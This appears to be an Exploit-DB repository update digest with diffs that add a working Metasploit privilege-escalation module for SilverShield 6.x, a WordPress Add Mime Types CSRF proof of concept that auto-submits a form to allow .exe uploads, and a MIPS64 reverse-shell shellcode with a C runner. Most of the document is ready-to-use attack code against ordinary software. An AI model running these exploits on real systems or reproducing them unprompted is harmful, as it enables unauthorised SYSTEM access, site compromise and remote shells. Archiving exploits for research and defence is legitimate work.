DB: 2019-08-21

3 changes to exploits/shellcodes

SilverSHielD 6.x - Local Privilege Escalation

WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery

Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes)
Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)
Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)

Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)

exploits/multiple/local/47197.rb

@@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Exploit Title: extenua SilverSHielD 6.x local priviledge escalation
+# Google Dork: na
+# Date: 31 Jul 2019
+# Exploit Author: Ian Bredemeyer
+# Vendor Homepage: https://www.extenua.com
+# Software Link: https://www.extenua.com/silvershield
+# Version: 6.x
+# Tested on: Windows7 x64, Windows7 x86, Windows Server 2012 x64, Windows10 x64, Windows Server 2016 x64
+# CVE: CVE-2019-13069
+
+# More Info: https://www.fobz.net/adv/ag47ex/info.html
+
+require 'sqlite3'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+require 'tempfile'
+require 'securerandom'
+require 'digest'
+
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Post::File
+  include Msf::Exploit::Remote::SSH
+  include Msf::Post::Windows::Services
+  include Msf::Post::Windows::FileInfo
+
+  def initialize(info={})
+    super( update_info(info,
+      'Name'          => 'Extenua SilverSHielD 6.x local privilege escalation',
+      'Description'   => %q{
+        Extenua SilverShield 6.x fails to secure its ProgramData subfolder.
+        This module exploits this by injecting a new user into the database and then
+        using that user to login the SSH service and obtain SYSTEM. 
+        This results in to FULL SYSTEM COMPROMISE. 
+        At time of discolsure, no fix has been issued by vendor.
+      },
+      'Author'        => [
+        'Ian Bredemeyer',
+        ],
+      'Platform'      => [ 'win','unix' ],  # 'unix' is needed, otherwise the Payload is flagged as incompatible
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [
+        [ 'Universal', {} ],
+      ],
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultTarget' => 0,
+      'References'    => [
+        [ 'CVE', '2019-13069' ],
+        [ 'URL', 'https://www.fobz.net/adv/ag47ex/info.html' ],
+        [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13069' ]
+      ],
+      'DisclosureDate'=> "Jul 31 2019",
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+    ))
+
+    register_options([
+      OptPort.new('PF_PORT', [ true, 'Local port to PortFwd to victim', 20022 ]),
+      OptString.new('SS_IP', [ false, 'IP address SilverShield is listening on at the victim. Leave blank to detect.', '' ]),
+      OptPort.new('SS_PORT', [ false, 'Port SilverShield is listening on at the victim.  Leave at 0 to detect.', 0 ]),
+      OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 15])
+    ])
+  end
+
+  
+
+  # Grabbed this bit from another exploit I was pulling apart... Need to trick the SSH session a bit
+  module ItsAShell
+    def _check_shell(*args)
+      true
+    end
+  end
+  
+  
+  
+  # helper methods that normally come from Tcp
+  def rhost
+    return '127.0.0.1'
+  end
+  def rport
+    datastore['PF_PORT']
+  end
+
+  
+
+  # Does a basic check of SilverShield... Does not fail if there is a problem, but will return false
+  def do_check_internal()
+  
+    looks_ok = true    # lets assume everything is OK...
+  
+    # Try to get the path of the SilverShield service...
+    ss_serviceinfo = service_info("SilverShield")
+    ss_servicepath = ss_serviceinfo[:path]
+    if (ss_servicepath == '')
+        print_warning("Vulnerable Silvershield service is likely NOT running on the target system")
+        looks_ok = false
+    else
+        print_good("Silvershield service found: " + ss_servicepath)
+    end
+
+
+    # Try to read the version of Silvershield from the resigstry of the victim...
+    ss_version = ""
+    begin
+      ss_version = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\\extenua\\SilverShield', KEY_READ).query_value("Version").data
+    rescue ::Exception => e
+      print_warning "Cannot find SilverShield version in registry.  Victim may not have vulnerable SilverShield installed"
+      looks_ok = false
+    end
+    if ss_version != ""
+      print_good("Silvershield version from registry: " + ss_version)
+      if ss_version[0..1] != "6."    # If not version "6." something ?  then this will not work...
+        print_warning("This version is not likely vulnerable to this module")
+        looks_ok = false
+      end      
+    end  
+    return looks_ok
+    
+  end
+  
+ 
+  
+  
+  # Attempts a single SSH login to the victim via the local port forwarded to fictim.  Returns valid connection if OK
+  def do_login()
+    factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
+    opt_hash = {
+      :auth_methods    => ['password'],
+      :port            => rport,
+      :use_agent       => false,
+      :config          => false,
+      :proxy           => factory,
+      :password        => @@the_password,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    begin
+      ssh_socket = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh_socket = Net::SSH.start(rhost, 'haxor4', opt_hash)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh_socket
+      # Create a new session from the socket, then dump it.
+      conn = Net::SSH::CommandStream.new(ssh_socket)
+      ssh_socket = nil
+      return conn
+    else
+      return false
+    end
+  end
+
+  
+  
+  # Attempts several times to connect through session back to SilverShield as haxor then open resulting shell as a new session.
+  def exploit_sub
+    x = 0
+    while x < 5 do 
+        x = x + 1
+        print_status "SSH login attempt " + x.to_s + ".  May take a moment..."
+
+        conn = do_login()
+        if conn
+          print_good "Successful login.  Passing to handler..."
+          handler(conn.lsock)
+          return true
+        end
+    end     
+    return false
+  end
+
+
+  
+  def check()
+    if do_check_internal
+        Exploit::CheckCode::Appears
+    else
+        Exploit::CheckCode::Safe
+    end
+  end
+  
+  
+  
+  # The guts of it...
+  def exploit
+  
+    # Some basic setup...
+    payload_instance.extend(ItsAShell)
+    factory = ssh_socket_factory
+    
+    
+    # Do a quick check... well, sort of, just shows info.  We won't stop, just report to user...
+    do_check_internal()
+    
+    
+    # We will generate a NEW password and salt.  Then get the relevant hash to inject...
+    @@the_password = SecureRandom.hex
+    @@the_password_salt = SecureRandom.hex[0..7]
+    @@the_password_hash = Digest::MD5.hexdigest @@the_password_salt + @@the_password
+    vprint_status("generated- user:haxor4  password:" + @@the_password + " salt:" + @@the_password_salt + " => hash(md5):" + @@the_password_hash)
+
+
+    # Get a tempfile on the local system.  Garbage collection will automaticlly kill it off later...
+    # This is a temp location where we will put the sqlite database so we can work on it on the local machine...
+    tfilehandle = Tempfile.new('ss.db.')
+    tfilehandle.close
+    wfile = tfilehandle.path
+
+
+    #Try to get the ProgramData path from the victim, this is where the SQLite databasae is held...
+    progdata = session.fs.file.expand_path("%ProgramData%")    # client.sys.config.getenv('PROGRAMDATA')
+    print_status 'Remote %ProgramData% = ' + progdata
+
+
+    # Lets check the file exists, then download from the victim to the local file system...
+    filecheck = progdata + '\SilverShield\SilverShield.config.sqlite'
+    fsrc = filecheck
+    fdes = wfile  
+    print_status 'Try download: ' + fsrc + '  to: ' + fdes
+    begin
+      ::Timeout.timeout(5) do
+            session.fs.file.download_file(fdes, fsrc)
+      end
+    rescue ::Exception => e
+      print_error "Cannot download #{fsrc} to #{fdes}  #{e.class} : #{e.message}"
+      print_error "Does victim even have vulnerable SilverShield installed ?"
+      fail_with(Failure::Unknown, "Fail download")
+    end
+
+
+    # Try to connect with sqlite locally...
+    vprint_status 'Trying to open database ' + wfile
+    db = SQLite3::Database.open wfile
+
+
+    # Remove haxor4 if its already there, just incase by pure chance a user with that name already exists...
+    vprint_status 'remove user "haxor4" if its already in there...'
+    results = db.execute "delete from USERS where vcusername='haxor4'"
+    answer = ""
+    results.each { |row| answer = answer + row.join(',') }
+
+
+    # Insert the haxor user... we will use this later to connect back in as SYSTEM
+    vprint_status 'insert user "haxor4" with password "' + @@the_password + '" into database'
+    results = db.execute "INSERT INTO USERS (CUSERID, VCUSERNAME, CSALT,CPASSWORD, VCHOMEDIR, BGETFILE, BPUTFILE, BDELFILE, BMODFILE, BRENFILE, BLISTDIR, BMAKEDIR, BDELDIR, BRENDIR, IAUTHTYPES, BAUTHALL, BALLOWSSH, BALLOWSFTP, BALLOWFWD, BALLOWDAV, IACCOUNTSTATUS, BAUTODISABLE, DTAUTODISABLE, BWINPASSWD, BISADMIN)VALUES(\"{11112222-3333-4444-5555666677778888}\",\"haxor4\",\"" + @@the_password_salt + "\",\"" + @@the_password_hash + "\",\"c:\\\",1,1,1,1,1,1,1,1,1,20,0,1,0,0,0,0,0,-700000.0, 0, 1);"
+    answer = ""
+    results.each { |row| answer = answer + row.join(',') }
+    print_good 'user inserted OK'
+
+
+    # Dump out local port that SilverShield has been configured to listen on at the victim machine...
+    results = db.execute "select IPORT from maincfg"
+    answer = ""
+    results.each { |row| answer = answer + row.join(',') }
+    ss_port = answer
+    print_status "SilverShield config shows listening on port: " + ss_port
+    if (datastore['SS_PORT'] != 0) 
+        ss_port = datastore['SS_PORT'].to_s
+        print_status "SS_PORT setting forcing port to " + ss_port
+    end
+    if (ss_port == '')
+        ss_port = '22'
+    end
+
+
+    # Dump out local IP that SilverShield has been configured to listen on at the victim machine...
+    results = db.execute "select CBINDIP from maincfg"
+    answer = ""
+    results.each { |row| answer = answer + row.join(',') }
+    ss_ip = answer
+    print_status "SilverShield config shows listening on local IP: " + ss_ip
+    if (datastore['SS_IP'] != '') 
+        ss_ip = datastore['SS_IP']
+        print_status "SS_IP setting forcing IP to " + ss_ip
+    end
+    # If the override AND the detection have come up with nothing, then use the default 127.0.0.1
+    if (ss_ip == '') 
+        ss_ip = '127.0.0.1'
+    end
+
+
+    # Close the database. Keep it neat
+    db.close
+
+
+    # Now lets upload this file back to the victim...due to bad folder permissions, we can sneak our bad config back in.  Yay
+    fdes = filecheck  
+    fsrc = wfile
+    print_status 'Sending modded file back to victim' 
+    begin
+      ::Timeout.timeout(5) do
+            session.fs.file.upload_file(fdes, fsrc)
+      end
+    rescue ::Exception => e
+      print_error "Cannot upload #{fsrc} to #{fdes}  #{e.class} : #{e.message}"
+      print_error "Perhaps this server is not vulnerable or has some other mitigation."
+      fail_with(Failure::Unknown, "Fail upload")
+    end
+    sleep 4   # wait a few seconds... this gives the SilverShield service some time to see the settings have changed.
+
+
+    # Delete the port if its already pointing somewhwere...  This a bit ugly and may generate an error, but I don't care.
+    client.run_cmd("portfwd delete -l " + datastore['PF_PORT'].to_s)
+
+
+    # Forward a local port through to the ssh port on the victim. 
+    client.run_cmd("portfwd add -l " + datastore['PF_PORT'].to_s + " -p " + ss_port + " -r " + ss_ip)
+
+
+    # Now do ssh work and hand off the session to the handler...
+    exploit_sub
+
+  end 
+
+end

exploits/php/webapps/47295.html

@@ -0,0 +1,25 @@
+# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
+# Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
+# Date: 18 july, 2019
+# Exploit Author: Princy Edward
+# Exploit Author Blog : https://prinyedward.blogspot.com/
+# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
+# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
+# Version: 2.2.1
+# Tested on: Apache/2.2.24 (CentOS)
+# CVE : Fresh
+
+#About Plugin
+The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
+#Vulnerable Description
+WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
+## CSRF Code
+Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.
+<html>
+<body onload="document.forms[0].submit()">
+<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
+<input type="hidden" name="mime_type_values" value="exe    =    application/x-msdownload">
+<input type="submit">
+</form>
+</body>
+</html>

files_exploits.csv

@@ -10656,6 +10656,7 @@ id,file,description,date,author,type,platform,port
 47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple,
 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
+47197,exploits/multiple/local/47197.rb,"SilverSHielD 6.x - Local Privilege Escalation",2019-08-01,"Ian Bredemeyer",local,multiple,
 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
 47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
@@ -41653,3 +41654,4 @@ id,file,description,date,author,type,platform,port
 47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80
 47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
+47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,

files_shellcodes.csv

@@ -996,6 +996,7 @@ id,file,description,date,author,type,platform
 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
 47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
 47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
-47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
-47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
 47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47296,shellcodes/linux/47296.c,"Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)",2019-08-20,antonio,shellcode,linux

shellcodes/linux/47296.c

@@ -0,0 +1,113 @@
+/*
+ *    # Reverse shell shellcode for Linux MIPS64 (mips64el)
+ *    # Default port: tcp/4444
+ *    # Host: localhost
+ *    # Date: August 19 - 2019	
+ *    # Author: Antonio de la Piedra
+ *    # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta 
+ *    # Size: 157 bytes
+ *    # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
+ */
+
+#include <stdio.h>
+#include <string.h>
+
+/*
+.text
+        .global __start
+__start:
+
+        dli $s4, -3
+        dli $s5, -17
+        nor $a0,$s4,$zero
+        nor $a1,$s4,$zero
+        slti    $a2,$zero,-1
+        li      $v0,5040 
+        syscall 0x40404
+
+        sw   $v0, -32($sp) 
+        lw $a0, -32($sp)
+
+        nor $t0,$s4,$zero 
+        sw $t0, -12($sp)
+        dli     $t2,0x5c11 
+        sw      $t2,-10($sp)
+        dli     $t1,0x0101017f 
+        sw      $t1,-8($sp)
+        daddiu  $a1,$sp,-12
+        nor $a2,$s5,$zero
+        dli     $v0,5041 
+        syscall 0x40404
+
+        nor $a1,$s4,$zero
+        dli     $s0, -1
+loop:
+        dli     $v0,5032
+        syscall 0x40404
+        daddi   $a1,$a1,-1
+        bne     $a1,$s0,loop
+        dli     $t0,0x69622f2f 
+        sw      $t0,-12($sp)
+        dli     $t1,0x68732f6e
+        dli     $t1,0x68732f6e
+        sw      $t1,-8($sp)
+        sw      $zero,-4($sp)
+        daddiu $a0,$sp,-12
+        slti    $a1,$zero,-1   
+        slti    $a2,$zero,-1
+        dli     $v0,5057
+        syscall 0x40404
+.align 8
+*/
+
+unsigned char code[] = 
+      "\xfd\xff\x14\x24"
+      "\xfd\xff\x14\x24"
+      "\xef\xff\x15\x24"
+      "\x27\x20\x80\x02"
+      "\x27\x28\x80\x02"
+      "\xff\xff\x06\x28"
+      "\xb0\x13\x02\x24"
+      "\x0c\x01\x01\x01"
+      "\xe0\xff\xa2\xaf"
+      "\xe0\xff\xa4\x8f"
+      "\x27\x60\x80\x02"
+      "\xf4\xff\xac\xaf"
+      "\x11\x5c\x0e\x24"
+      "\xf6\xff\xae\xaf"
+      "\x01\x01\x0d\x3c"
+      "\x7f\x01\xad\x35"
+      "\xf8\xff\xad\xaf"
+      "\xf4\xff\xa5\x67"
+      "\x27\x30\xa0\x02"
+      "\xb1\x13\x02\x24"
+      "\x0c\x01\x01\x01"
+      "\x27\x28\x80\x02"
+      "\xff\xff\x10\x24"
+      "\xa8\x13\x02\x24"
+      "\x0c\x01\x01\x01"
+      "\xff\xff\xa5\x60"
+      "\xfc\xff\xb0\x14"
+      "\x62\x69\x0c\x3c"
+      "\x2f\x2f\x8c\x35"
+      "\xf4\xff\xac\xaf"
+      "\x73\x68\x0d\x3c"
+      "\x6e\x2f\xad\x35"
+      "\xf8\xff\xad\xaf"
+      "\xfc\xff\xa0\xaf"
+      "\xf4\xff\xa4\x67"
+      "\xff\xff\x05\x28"
+      "\xff\xff\x06\x28"
+      "\xc1\x13\x02\x24"
+      "\x0c\x01\x01\x01";
+
+int main(int argc, char ** argv)
+{
+        void(*s)(void);
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+
+        s = code;
+        s();
+
+}